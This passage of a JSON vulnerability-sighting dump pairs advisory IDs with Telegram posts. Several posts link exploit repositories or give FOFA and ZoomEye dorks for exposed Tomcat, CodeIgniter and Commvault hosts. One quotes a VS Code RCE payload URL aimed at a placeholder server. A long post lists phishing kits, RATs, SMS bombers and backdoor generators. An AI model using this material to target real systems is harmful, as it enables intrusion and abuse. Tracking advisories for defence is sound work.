\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f\n\n\u041f\u043e \u0442\u0430\u043a\u043e\u043c\u0443 \u0441\u043b\u0443\u0447\u0430\u044e Cisco \u0434\u0430\u0436\u0435 \u0442\u0435\u043c, \u0443 \u043a\u043e\u0433\u043e \u043f\u043e\u0434\u043f\u0438\u0441\u043a\u0438 \u043d\u0435\u0442, \u0430\u043f\u0434\u0435\u0439\u0442 \u043e\u0431\u0435\u0449\u0430\u0435\u0442 - \u043f\u043e \u0441\u0435\u0440\u0438\u0439\u043d\u043e\u043c\u0443 \u043d\u043e\u043c\u0435\u0440\u0443 \u0438 \u0441\u0441\u044b\u043b\u043a\u0435 \u043d\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043d\u0430 https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html.\n\n\u041d\u0443 \u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043e\u0434\u0438\u043d \u0438\u0437 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430: https://github.com/yassineaboukir/CVE-2018-0296", "creation_timestamp": "2018-07-05T08:32:03.000000Z"}, {"uuid": "f4eb2dba-fd64-4100-bbfc-6e2f7da46c6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:0010", "type": "seen", "source": "https://t.me/antichat/3187", "content": "Important: rh-perl524-perl security update\nhttps://access.redhat.com/errata/RHSA-2019:0010", "creation_timestamp": "2019-01-02T17:37:09.000000Z"}, {"uuid": "e38498df-874f-4b58-9cc5-ce676b3cd16e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/35169", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/Yuweixn/Anydesk-Exploit-CVE-2025-12654-RCE-Builder\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-03T16:18:18.000000Z"}, {"uuid": "71aeb515-0a4e-4563-8f73-ca28b6ec14e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/35395", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/vigilante-1337/CVE-2025-32433\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-03T13:06:56.000000Z"}, {"uuid": "0afb7bd0-6739-42d6-81ed-1edcd33a0e70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/35805", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/Mattb709/CVE-2025-34028-PoC-Commvault-RCE\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-06T18:17:52.000000Z"}, {"uuid": "5d2fa78e-cc26-4439-b32a-a7dc823e6548", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/46323", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/platsecurity/CVE-2025-32433\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-02T18:27:33.000000Z"}, {"uuid": "9146ea8a-8a7f-4963-8d9f-a998c21e6e46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WM47-8V5P-WJPJ", "type": "seen", "source": "https://t.me/YAH_Channel/393", "content": "Request Smuggling \u0432 HTTP/2 \u0434\u043b\u044f \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 Netty:\n\n\u041e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u0435\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0436\u0435 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u043b\u0430 \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f\u0445:\nhttps://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj", "creation_timestamp": "2021-03-25T20:52:55.000000Z"}, {"uuid": "f681ecc3-9286-4253-88a4-a90002be366d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9952-GV64-X94C", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/19113", "content": "\ud83d\udea8CVE-2025-54418: CodeIgniter4's ImageMagick Handler has Command Injection Vulnerability\n\nFOFA Query: app=\"CodeIgniter-PHP-Framework\"\n\nResults: 2,254,632\n\nFOFA: https://en.fofa.info/result?qbase64=YXBwPSJDb2RlSWduaXRlci1QSFAtRnJhbWV3b3JrIg%3D%3D\n\nCVSS: 9.8\n\nAdvisory: https://github.com/advisories/GHSA-9952-gv64-x94c", "creation_timestamp": "2025-07-30T18:47:20.000000Z"}, {"uuid": "38157559-2fb3-4ab7-b83f-53b58475048c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JXR6-QRXX-2PH2", "type": "seen", "source": "https://t.me/ctinow/235814", "content": "[GHSA-jxr6-qrxx-2ph2] num2words subjected to phishing attack, two versions published containing malware\nhttps://ift.tt/jJG9szQ", "creation_timestamp": "2025-07-31T19:59:50.000000Z"}, {"uuid": "cc4ca5d4-a682-4d93-986c-61b407014d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JXR6-QRXX-2PH2", "type": "seen", "source": "https://t.me/ctinow/235813", "content": "[GHSA-jxr6-qrxx-2ph2] num2words subjected to phishing attack, two versions published containing malware\nhttps://ift.tt/PajqcML", "creation_timestamp": "2025-07-31T19:54:33.000000Z"}, {"uuid": "f2ddc5ef-2571-4a60-82d9-eb06b35c0be9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X574-M823-4X7W", "type": "published-proof-of-concept", "source": "Telegram/C1-VU2gk3ZCgj49KfzdA3E3vdUpKoicmY6MT6hUVGsPZAac", "content": "", "creation_timestamp": "2025-03-27T11:11:50.000000Z"}, {"uuid": "012fd93b-f333-4e95-9a7f-bd874a4ce37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/3441", "content": "&gt; Thus, our command URI, which makes the user launch a new terminal, and instructs that terminal to run \u2018vim /etc/passwd\u2019. This opens the password file of the user\u2019s computer, demonstrating our ability to run code on their machine.\n\n&gt; Once the server described above is run, when victim clicks a prepared link (for example https://vscode.dev/?payload=%5B%5B%22openFile%22,%22https://%5Bserver_location_goes_here%5D/something.ipynb%22) VSCode will load the file, detect it as a Jypiter Notebook, and immediately run a command on the user\u2019s machine.\n\nVisual Studio Code: Remote Code Execution\nhttps://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m\n\n\u0417\u0430 \u0441\u0441\u044b\u043b\u043a\u0443 \u0441\u043f\u0430\u0441\u0438\u0431\u043e @olegkovalov", "creation_timestamp": "2022-12-02T15:04:50.000000Z"}, {"uuid": "198a71d5-fafc-4363-8b44-ea7cdb9a0a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JVVH-FP57-2P32", "type": "published-proof-of-concept", "source": "Telegram/rXYL1lXWkEU6X4s-B12vmJDiUkp3J5RpkWN8Rf8Wlc0XZWI", "content": "", "creation_timestamp": "2025-06-02T12:01:30.000000Z"}, {"uuid": "5cdf3148-c351-4196-9ab9-ac05684c8a0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q9C-PJW5-5RJM", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18350", "content": "\ud83d\udea8CVE-2025-34028: Pre-Authentication RCE Vulnerability in Commvault Command Center\n\nZoomEye Link: https://www.zoomeye.ai/searchResult?q=YXBwPSJDb21tdmF1bHQgQ29tbWFuZCBDZW50ZXIi\n\nZoomEye Dork: app=\"Commvault Command Center\"\n\nResults: 3,252\n\nAdvisory: https://github.com/advisories/GHSA-6q9c-pjw5-5rjm\n\nPoC: https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028\n\nCVSS: 10\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership.\n\nI am trying to do more for the DWI community, so this is just the start! \ud83d\udc99", "creation_timestamp": "2025-06-19T18:45:56.000000Z"}, {"uuid": "c7348f38-d856-4c88-852d-bdbef074f154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RXV-5JHH-J6XX", "type": "published-proof-of-concept", "source": "Telegram/xYRYp9RnMrs6asvPZWHHQ0msOulfM9P8474m_eOJ4G31k98", "content": "", "creation_timestamp": "2025-06-24T04:32:30.000000Z"}, {"uuid": "16b76600-7e48-4723-917f-3a3705f1aadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CMP2-5F6G-MW34", "type": "published-proof-of-concept", "source": "Telegram/xYRYp9RnMrs6asvPZWHHQ0msOulfM9P8474m_eOJ4G31k98", "content": "", "creation_timestamp": "2025-06-24T04:32:30.000000Z"}, {"uuid": "25c7e2db-91a1-4ca4-a02a-074d82682c07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ44-9VCG-WJQ7", "type": "published-proof-of-concept", "source": "Telegram/xYRYp9RnMrs6asvPZWHHQ0msOulfM9P8474m_eOJ4G31k98", "content": "", "creation_timestamp": "2025-06-24T04:32:30.000000Z"}, {"uuid": "60bb29bb-d57a-45f0-b98d-a655cd9b2219", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJWM-RVH2-C87W", "type": "seen", "source": "https://t.me/alexmakus/4349", "content": "\u0412\u0437\u043b\u043e\u043c\u0430\u043b\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0443\u044e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443\u00a0UAParser.js, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 user-agent \u0441\u0442\u0440\u043e\u043a\u0430\u0445\u2014 \u0432 \u043d\u0435\u0451 \u0432\u0441\u0442\u0440\u043e\u0438\u043b\u0438 \u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440 \u043d\u0430 \u0442\u0435\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445, \u0433\u0434\u0435 \u043e\u043d\u0430 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430. 6-7 \u043c\u043b\u043d \u0437\u0430\u043a\u0430\u0447\u0435\u043a \u0432 \u043d\u0435\u0434\u0435\u043b\u044e, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c npm\n\nhttps://github.com/advisories/GHSA-pjwm-rvh2-c87w", "creation_timestamp": "2021-10-23T11:55:15.000000Z"}, {"uuid": "0539988c-5779-4d00-a20a-324ca8fa8085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83QJ-6FR2-VHQG", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18294", "content": "\ud83d\udea8CVE-2025-24813: Apache Tomcat potential RCE and/or information disclosure and/or information corruption with partial PUT\n\nZoomEye Link: https://www.zoomeye.ai/searchResult?q=YXBwPSJBcGFjaGUgVG9tY2F0Ig%3D%3D\n\nZoomEye Dork: app=\"Apache Tomcat\"\n\nResults: 815,431 \n\nAdvisory: https://github.com/advisories/GHSA-83qj-6fr2-vhqg\n\nPoC: https://github.com/absholi7ly/POC-CVE-2025-24813\n\nCVSS: 9.2\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership.\n\nI am trying to do more for this community, so this is just the start! \ud83d\udc99", "creation_timestamp": "2025-06-18T16:12:19.000000Z"}, {"uuid": "f6659827-504b-4b56-bc7c-427a5d247f2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170317-CMP", "type": "seen", "source": "https://t.me/alexmakus/1033", "content": "\u043f\u043e\u043c\u043d\u0438\u0442\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u044e \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u043e\u0432 \u0426\u0420\u0423 \u043d\u0430 Wikileaks \u043f\u0430\u0440\u0443 \u043d\u0435\u0434\u0435\u043b\u044c \u043d\u0430\u0437\u0430\u0434? \u0432\u043e\u0442 \u043f\u0435\u0440\u0432\u044b\u0435 \u0446\u0432\u0435\u0442\u043e\u0447\u043a\u0438: Cisco \u043f\u0438\u0448\u0435\u0442, \u0447\u0442\u043e \u0443 318 \u043c\u043e\u0434\u0435\u043b\u0435\u0439 \u0441\u0432\u0438\u0447\u0435\u0439 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043f\u043e\u043b\u043d\u044b\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c \u043f\u043e\u0441\u043b\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp", "creation_timestamp": "2017-03-21T18:54:38.000000Z"}, {"uuid": "593a8b0f-e324-4974-9035-de250e18a36c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-584Q-6J8J-R5PM", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/668", "content": "https://github.com/cryptocoinjs/secp256k1-node/security/advisories/GHSA-584q-6j8j-r5pm\n\nPrivate key extraction over ECDH cve-2024-48930\n#github #exploit", "creation_timestamp": "2024-10-30T11:03:37.000000Z"}, {"uuid": "80f8f3e2-578d-479f-81aa-4cbcee94a9ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-985R-Q3QP-299H", "type": "seen", "source": "https://t.me/bdufstecru/3261", "content": "", "creation_timestamp": "2026-07-14T01:00:05.715530Z"}, {"uuid": "9c383d97-f77e-4135-953b-cd6889feb7f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6C3J-C64M-QHGQ", "type": "seen", "source": "Telegram/KQJ2fokDRUpEEMEdtilLJpNYW94QEwCQWFCqP7BH6XiY", "content": "", "creation_timestamp": "2024-09-12T10:16:41.000000Z"}, {"uuid": "3c24a3b9-c855-408a-bd0b-dfb4a7479407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G2PF-XV49-M2H5", "type": "seen", "source": "https://t.me/bdufstecru/3288", "content": "", "creation_timestamp": "2026-07-14T01:00:04.993632Z"}, {"uuid": "3f0cc3ca-e707-474c-b796-826bc0657b7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7883", "type": "seen", "source": "https://t.me/ctinow/156880", "content": "https://ift.tt/xZRvkms\nRHSA-2023:7883: Important: postgresql:15 security update", "creation_timestamp": "2023-12-20T11:18:03.000000Z"}, {"uuid": "a74c7edb-3dad-4602-b6d3-bf0a56144775", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R6G-FHH4-XHMQ", "type": "seen", "source": "https://t.me/ctinow/156792", "content": "https://ift.tt/eS045wE\nCVE-2023-49078 | zediious raptor-web 0.4.4 Link cross site scripting (GHSA-8r6g-fhh4-xhmq)", "creation_timestamp": "2023-12-20T08:01:59.000000Z"}, {"uuid": "2c05a55f-69a3-43ec-ad5d-7120fd96fd43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4J6X-2764-M8GH", "type": "seen", "source": "https://t.me/bdufstecru/3289", "content": "", "creation_timestamp": "2026-07-14T01:00:04.788045Z"}, {"uuid": "34be35db-7ece-419a-abe6-50d90a306bec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7886", "type": "seen", "source": "https://t.me/ctinow/157017", "content": "https://ift.tt/lGdWEI8\nRHSA-2023:7886: Important: tigervnc security update", "creation_timestamp": "2023-12-20T14:18:24.000000Z"}, {"uuid": "deb628d3-405f-45dd-9bd2-b0b7e7b3f483", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F39-6537-3CGC", "type": "seen", "source": "https://t.me/ctinow/156931", "content": "https://ift.tt/KIB0emO\nCVE-2023-49079 | misskey prior 2023.11.1-beta.1 signature verification (GHSA-3f39-6537-3cgc)", "creation_timestamp": "2023-12-20T12:36:53.000000Z"}, {"uuid": "201083c7-5a80-4b77-b1b3-5bc76cb620f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GXHX-G4FQ-49HJ", "type": "seen", "source": "https://t.me/ctinow/156873", "content": "https://ift.tt/jteVimy\nCVE-2023-49090 | CarrierWave up to 2.2.4/3.0.4 cross site scripting (GHSA-gxhx-g4fq-49hj)", "creation_timestamp": "2023-12-20T11:12:32.000000Z"}, {"uuid": "208c6258-92fa-4a6e-9f93-5a42a8cf8272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X574-M823-4X7W", "type": "seen", "source": "https://t.me/badbclubua/49", "content": "\u041e\u0431\u0445\u043e\u0434 \u0447\u0442\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 vite.js https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u0438\u043a\u0438 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u0447\u0442\u043e \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0438 \u0435\u0441\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \ud83d\ude08", "creation_timestamp": "2025-03-27T10:36:37.000000Z"}, {"uuid": "22d95b33-5b44-4979-8ea8-2bcdba3ccea5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X574-M823-4X7W", "type": "seen", "source": "https://t.me/NinjaSec/217", "content": "1. File Droppers / Remote Execution Tools\n\nUmbrella \u2013 File dropper for pentests, executes files silently\nhttps://github.com/4w4k3\n\nDocEx \u2013 Document-based data exfiltration\nhttps://github.com/DarkSpaceSecurity/DocEx\n---\n\n2. Wireless Attacks / Wi-Fi Pentesting\n\nWifiphisher \u2013 Rogue access point framework\nhttps://github.com/wifiphisher/wifiphisher.git\n---\n\n3. Termux Tool Collections\n\nTermuxBlack \u2013 BlackArch-like repo for Termux\nhttps://github.com/Hax4us/TermuxBlack\n\nDevilX \u2013 110+ tools installer\nhttps://github.com/MrHacker-X/DevilX.git\n\nLazyMux \u2013 Easy installer for pentesting tools\nhttps://github.com/Gameye98/Lazymux\n\nT-Remix \u2013 Termux customizer with password and prompt themes\nhttps://github.com/Bhaviktutorials/T-Remix\n\nDh-All \u2013 300+ hacking tools in one installer\nhttps://github.com/DH-AL/Dh-All\n---\n\n4. OSINT / Recon / Information Gathering\n\nSMWYG \u2013 Massive credentials database for OSINT\nhttps://github.com/Viralmaniar/SMWYG-Show-Me-What-You-Got.git\n\nTrape \u2013 Real-time OSINT and social engineering framework\nhttps://github.com/jofpin/trape.git\n\nSnoop \u2013 Social media OSINT by username\nhttps://github.com/AnkhCornp/Snoop\n\nRadar \u2013 Tech &amp; service detection via DNS footprints\nhttps://github.com/Elite-Security-Systems/radar\n\nOSINT Tool Collection \u2013 100s of OSINT utilities\nhttps://github.com/cipher387/osint_stuff_tool_collection\n\nCustom OSINT Search Engines\nhttps://github.com/paulpogoda/OSINT-CSE\n\nONIOFF \u2013 Inspect Deep Web (onion) URLs\nhttps://github.com/k4m4/onioff.git\n---\n\n5. Phishing / Social Engineering Tools\n\nWishFish \u2013 Front camera phishing via link\nhttps://github.com/kinghacker0/WishFish\n\nBlackPhish \u2013 Phishing tool (BETA)\nhttps://github.com/iinc0gnit0/BlackPhish\n\nBlack Mafia (PUBG Phishing)\nhttps://github.com/lovehacker404/Phishing\n\nSocialFish \u2013 Phishing &amp; information collector\nhttps://github.com/UndeadSec/SocialFish\n---\n\n6. Exploits &amp; Vulnerability Research\n\nCommix \u2013 Command injection automation\nhttps://github.com/commixproject/commix.git\n\nUFONet \u2013 DDoS via botnets\nhttps://github.com/epsylon/ufonet.git\n\nURLFinder \u2013 Extract URLs from multiple sources\nhttps://github.com/projectdiscovery/urlfinder\n\nOSEP Resource (PEN-300)\nhttps://github.com/In3x0rabl3/OSEP\n\nFaraday \u2013 Vulnerability management platform\n\nCore: https://github.com/infobyte/faraday.git\n\nFrontend: https://github.com/infobyte/faraday_angular_frontend.git\n---\n\n7. SMS / Call Bombers\n\nXLR8_BOMBER \u2013 SMS/Call spam tool\nhttps://github.com/khansaad1275/XLR8_BOMBER\n\nMaster Bomber 2.0 \u2013 Online SMS/Call bomber\nhttps://github.com/jatinkalwar/m-bomber2.O\n---\n\n8. Remote Access / RATs\n\nAsyncRAT Dark Mode\nhttps://github.com/MonsterCadd/AsyncRAT-Dark-Mode\n---\n\n9. Bash / Virus Tools\n\nInfect \u2013 Bash-based Android virus spreader (warning: destructive)\nhttps://github.com/noob-hackers/infect\n---\n\n10. Brute Force &amp; Automation\n\nBrutegram \u2013 Instagram brute forcer\nhttps://github.com/Err0r-ICA/Brutegram\n---\n\n11. Mobile Forensics / Analysis\n\n./Phone \u2013 Mobile forensic toolkit\nhttps://github.com/cyb3rfortr3ss/Phone\n---\n\n12. Video / Media Tools\n\nbash2mp4 \u2013 YouTube video downloader for Termux\nhttps://github.com/htr-tech/bash2mp4\n\nInsta_report_eyes \u2013 Instagram report sender\nhttps://github.com/z6il/Insta_report_eyes\n---\n\n13. Operating Systems / Environment Tools\n\nInstall Ubuntu on Termux (No Root)\nhttps://github.com/tahmidrayat/ubuntu\n---\n\n14. Hacking Toolkits &amp; Generators\n\nKitHack \u2013 Toolkit and backdoor generator\nhttps://github.com/AdrMXR/KitHack\n\nBossAdv \u2013 2FA Bypass + Tunneling tool\nhttps://github.com/The-Boss-Hacker/BossAdv.git\n---\n\n15. Compilation / Exploit Injectors\n\nElfDoor-gcc \u2013 Inject payload into binaries via gcc\nhttps://github.com/MatheuZSecurity/ElfDoor-gcc\n---\n\n16. Vulnerability / Exploit Databases\n\n0day.today \u2013 Database of public and private exploits\nhttps://0day.today\n---\n\n17. Notable Links / References\n\nViteJS Advisory\nhttps://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w\n\ngrugq Snippet (Operational Security)\nhttps://gist.github.com/grugq/03167bed45e774551155\n\nKali Linux 2024.4 Release Notes\nhttps://kali.org/blog/kali-linux-2024-4-release/\n\n#GrayHats", "creation_timestamp": "2025-04-19T16:26:39.000000Z"}, {"uuid": "2440d625-2eb9-4215-a9b9-fe1ae251d43d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4CXX-HRM3-49RM", "type": "seen", "source": "https://t.me/TheDarkWebInformer/19184", "content": "\ud83d\udea8CVE-2025-54135: Cursor AI Code Editor Vulnerability Patched After Prompt Injection Exploit Allowed Remote Command Execution\n\nCVSS: 8.6\n\nVideo Credit: HiddenLayer\n\nAdvisory no longer available on GitHub: https://github.com/cursor/cursor/security/advisories/GHSA-4cxx-hrm3-49rm", "creation_timestamp": "2025-08-01T18:40:52.000000Z"}, {"uuid": "04963f03-5efd-4b8c-bd09-4fd8c6fd5eb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:4650", "type": "seen", "source": "https://t.me/Cyber_Watch_insider/25", "content": "https://access.redhat.com/errata/RHSA-2023:4650", "creation_timestamp": "2023-08-15T03:29:35.000000Z"}, {"uuid": "afd411a6-ff40-4cbe-b21e-284705034ce3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:4650", "type": "seen", "source": "https://t.me/Cyber_Watch_insider/24", "content": 